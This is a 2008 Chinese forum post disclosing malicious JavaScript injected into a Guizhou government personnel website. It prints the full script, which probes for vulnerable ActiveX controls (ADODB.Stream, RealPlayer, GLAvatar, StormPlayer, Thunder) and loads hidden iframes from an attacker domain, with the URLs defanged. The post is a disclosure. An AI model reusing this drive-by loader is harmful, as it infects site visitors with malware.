马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?注册用户
x
听朋友讲今年的公务员招考简章出来了,于是到人事厅网站“贵州人事人才网”查看,找到了“贵州省2008年省、市、县三级机关统一面向社会公开招考公务员简章”。我由于9月份拿不到毕业证书,只得放弃这次考试。凭着对网站网页的敏感,发现此网站有来源不明的网页地址,后确认为刷流量代码。由于此次公务员考试,在带来人事网的流量同时,不知会也给那恶意代码的网址带来多少流量!
恶意网址显露无遗
挖出嵌入到网站页面中的代码
以下为am2.htm中的全部代码-
- <script language="javaScript">
- var cook = "silentwm";
- function setCookie(name, value, expire)
- {
- window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
- }
- function getCookie(Name)
- {
- var search = Name + "=";
- if (window.document.cookie.length > 0)
- {
- offset = window.document.cookie.indexOf(search);
- if (offset != -1)
- {
- offset += search.length;
- end = window.document.cookie.indexOf(";", offset)
- if (end == -1)
- end = window.document.cookie.length;
- return unescape(window.document.cookie.substring(offset, end));
- }
- }
- return null;
- }
- function register(name)
- {
- var today = new Date();
- var expires = new Date();
- expires.setTime(today.getTime() + 1000*60*60*24);
- setCookie(cook, name, expires);
- }
- function openWM()
- {
- var c = getCookie(cook);
- if (c != null)
- {
- return;
- }
-
- register(cook);
-
- window.defaultStatus="完成";
-
- try{ var e;
- var ado=(document.createElement("object"));
- ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
- var as=ado.createobject("Adodb.Stream","")}
- catch(e){};
- finally{
- if(e!="[object Error]"){
- document.write("<iframe width=50 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/ax14.htm></iframe>")}
- else
- {
- try{ var j;
- var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
- catch(j){};
- finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("RODUCTVERSION")<="6.0.14.552")
- {document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re10.htm></iframe>')}
- else
- {
- document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re11.htm></iframe>')}}}
- try{ var g;
- var glworld=new ActiveXObject("GLAVATAR.GLAvatarCtrl.1");}
- catch(g){};
- finally{if(g!="[object Error]"){
- document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/axlz.htm></iframe>')}}
- try{ var h;
- var storm=new ActiveXObject("MPS.StormPlayer.1");}
- catch(h){};
- finally{if(h!="[object Error]"){
- document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/bb.htm></iframe>')}}
- try{ var f;
- var thunder=new ActiveXObject("DPClient.Vod");}
- catch(f){};
- finally{ if(f!="[object Error]"){
- document.write('<iframe width=50 height=0 src=xl.gif></iframe>')}}
- }}
- }
- openWM();
- </script>
- <script language="javascript" type="text/javascript" src="h-t-t-p去掉-://js.users.51.la/1862269.js"></script>
复制代码
[ 本帖最后由 正安一片瓦 于 2008-5-23 15:32 编辑 ] |